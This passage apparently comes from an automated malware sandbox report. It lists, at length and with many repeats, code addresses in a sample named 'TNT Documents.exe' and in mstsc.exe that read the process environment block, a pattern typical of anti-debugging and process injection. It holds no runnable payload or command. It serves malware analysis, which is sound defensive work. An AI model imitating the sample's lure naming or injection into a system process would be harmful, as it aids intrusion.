          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155AA16 mov eax, dword ptr fs:[00000030h]7_2_0155AA16
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01555210 mov eax, dword ptr fs:[00000030h]7_2_01555210
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01555210 mov ecx, dword ptr fs:[00000030h]7_2_01555210
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01555210 mov eax, dword ptr fs:[00000030h]7_2_01555210
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01555210 mov eax, dword ptr fs:[00000030h]7_2_01555210
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01573A1C mov eax, dword ptr fs:[00000030h]7_2_01573A1C
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01568A0A mov eax, dword ptr fs:[00000030h]7_2_01568A0A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01594A2C mov eax, dword ptr fs:[00000030h]7_2_01594A2C
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01594A2C mov eax, dword ptr fs:[00000030h]7_2_01594A2C
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AA16 mov eax, dword ptr fs:[00000030h]7_2_0161AA16
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AA16 mov eax, dword ptr fs:[00000030h]7_2_0161AA16
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582ACB mov eax, dword ptr fs:[00000030h]7_2_01582ACB
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582AE4 mov eax, dword ptr fs:[00000030h]7_2_01582AE4
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158D294 mov eax, dword ptr fs:[00000030h]7_2_0158D294
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158D294 mov eax, dword ptr fs:[00000030h]7_2_0158D294
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156AAB0 mov eax, dword ptr fs:[00000030h]7_2_0156AAB0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156AAB0 mov eax, dword ptr fs:[00000030h]7_2_0156AAB0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158FAB0 mov eax, dword ptr fs:[00000030h]7_2_0158FAB0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]7_2_015552A5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]7_2_015552A5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]7_2_015552A5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]7_2_015552A5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]7_2_015552A5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01577D50 mov eax, dword ptr fs:[00000030h]7_2_01577D50
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01593D43 mov eax, dword ptr fs:[00000030h]7_2_01593D43
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D3540 mov eax, dword ptr fs:[00000030h]7_2_015D3540
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157C577 mov eax, dword ptr fs:[00000030h]7_2_0157C577
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157C577 mov eax, dword ptr fs:[00000030h]7_2_0157C577
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628D34 mov eax, dword ptr fs:[00000030h]7_2_01628D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161E539 mov eax, dword ptr fs:[00000030h]7_2_0161E539
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]7_2_01563D34
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h]7_2_01584D3B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h]7_2_01584D3B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h]7_2_01584D3B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155AD30 mov eax, dword ptr fs:[00000030h]7_2_0155AD30
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015DA537 mov eax, dword ptr fs:[00000030h]7_2_015DA537
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h]7_2_0161FDE2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h]7_2_0161FDE2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h]7_2_0161FDE2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h]7_2_0161FDE2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01608DF1 mov eax, dword ptr fs:[00000030h]7_2_01608DF1
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]7_2_015D6DC9
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]7_2_015D6DC9
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]7_2_015D6DC9
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov ecx, dword ptr fs:[00000030h]7_2_015D6DC9
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]7_2_015D6DC9
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]7_2_015D6DC9
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156D5E0 mov eax, dword ptr fs:[00000030h]7_2_0156D5E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156D5E0 mov eax, dword ptr fs:[00000030h]7_2_0156D5E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158FD9B mov eax, dword ptr fs:[00000030h]7_2_0158FD9B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158FD9B mov eax, dword ptr fs:[00000030h]7_2_0158FD9B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016205AC mov eax, dword ptr fs:[00000030h]7_2_016205AC
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016205AC mov eax, dword ptr fs:[00000030h]7_2_016205AC
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582581 mov eax, dword ptr fs:[00000030h]7_2_01582581
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582581 mov eax, dword ptr fs:[00000030h]7_2_01582581
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582581 mov eax, dword ptr fs:[00000030h]7_2_01582581
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582581 mov eax, dword ptr fs:[00000030h]7_2_01582581
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]7_2_01552D8A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]7_2_01552D8A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]7_2_01552D8A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]7_2_01552D8A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]7_2_01552D8A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h]7_2_01581DB5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h]7_2_01581DB5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h]7_2_01581DB5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015835A1 mov eax, dword ptr fs:[00000030h]7_2_015835A1
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h]7_2_015EC450
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h]7_2_015EC450
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A44B mov eax, dword ptr fs:[00000030h]7_2_0158A44B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157746D mov eax, dword ptr fs:[00000030h]7_2_0157746D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]7_2_015D6C0A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]7_2_015D6C0A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]7_2_015D6C0A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]7_2_015D6C0A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]7_2_01611C06
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162740D mov eax, dword ptr fs:[00000030h]7_2_0162740D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162740D mov eax, dword ptr fs:[00000030h]7_2_0162740D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162740D mov eax, dword ptr fs:[00000030h]7_2_0162740D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158BC2C mov eax, dword ptr fs:[00000030h]7_2_0158BC2C
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016114FB mov eax, dword ptr fs:[00000030h]7_2_016114FB
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h]7_2_015D6CF0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h]7_2_015D6CF0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h]7_2_015D6CF0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628CD6 mov eax, dword ptr fs:[00000030h]7_2_01628CD6
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156849B mov eax, dword ptr fs:[00000030h]7_2_0156849B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628F6A mov eax, dword ptr fs:[00000030h]7_2_01628F6A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156EF40 mov eax, dword ptr fs:[00000030h]7_2_0156EF40
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156FF60 mov eax, dword ptr fs:[00000030h]7_2_0156FF60
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157F716 mov eax, dword ptr fs:[00000030h]7_2_0157F716
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h]7_2_015EFF10
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h]7_2_015EFF10
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h]7_2_0158A70E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h]7_2_0158A70E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158E730 mov eax, dword ptr fs:[00000030h]7_2_0158E730
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162070D mov eax, dword ptr fs:[00000030h]7_2_0162070D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162070D mov eax, dword ptr fs:[00000030h]7_2_0162070D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h]7_2_01554F2E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h]7_2_01554F2E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015937F5 mov eax, dword ptr fs:[00000030h]7_2_015937F5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01568794 mov eax, dword ptr fs:[00000030h]7_2_01568794
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]7_2_015D7794
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]7_2_015D7794
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]7_2_015D7794
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]7_2_01567E41
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]7_2_0157AE73
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h]7_2_0161AE44
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h]7_2_0161AE44
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156766D mov eax, dword ptr fs:[00000030h]7_2_0156766D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h]7_2_0158A61C
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h]7_2_0158A61C
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]7_2_0155C600
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]7_2_0155C600
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]7_2_0155C600
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01588E00 mov eax, dword ptr fs:[00000030h]7_2_01588E00
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160FE3F mov eax, dword ptr fs:[00000030h]7_2_0160FE3F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611608 mov eax, dword ptr fs:[00000030h]7_2_01611608
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155E620 mov eax, dword ptr fs:[00000030h]7_2_0155E620
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015836CC mov eax, dword ptr fs:[00000030h]7_2_015836CC
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01598EC7 mov eax, dword ptr fs:[00000030h]7_2_01598EC7
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160FEC0 mov eax, dword ptr fs:[00000030h]7_2_0160FEC0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628ED6 mov eax, dword ptr fs:[00000030h]7_2_01628ED6
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015676E2 mov eax, dword ptr fs:[00000030h]7_2_015676E2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015816E0 mov ecx, dword ptr fs:[00000030h]7_2_015816E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]7_2_01620EA5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]7_2_01620EA5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]7_2_01620EA5
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFE87 mov eax, dword ptr fs:[00000030h]7_2_015EFE87
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D46A7 mov eax, dword ptr fs:[00000030h]7_2_015D46A7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D7D50 mov eax, dword ptr fs:[00000030h]17_2_055D7D50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F3D43 mov eax, dword ptr fs:[00000030h]17_2_055F3D43
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633540 mov eax, dword ptr fs:[00000030h]17_2_05633540
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h]17_2_055DC577
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h]17_2_055DC577
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0563A537 mov eax, dword ptr fs:[00000030h]17_2_0563A537
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688D34 mov eax, dword ptr fs:[00000030h]17_2_05688D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567E539 mov eax, dword ptr fs:[00000030h]17_2_0567E539
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]17_2_055E4D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]17_2_055E4D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]17_2_055E4D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BAD30 mov eax, dword ptr fs:[00000030h]17_2_055BAD30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]17_2_0567FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]17_2_0567FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]17_2_0567FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]17_2_0567FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05668DF1 mov eax, dword ptr fs:[00000030h]17_2_05668DF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov ecx, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h]17_2_055CD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h]17_2_055CD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056805AC mov eax, dword ptr fs:[00000030h]17_2_056805AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056805AC mov eax, dword ptr fs:[00000030h]17_2_056805AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h]17_2_055EFD9B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h]17_2_055EFD9B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]17_2_055E1DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]17_2_055E1DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]17_2_055E1DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E35A1 mov eax, dword ptr fs:[00000030h]17_2_055E35A1
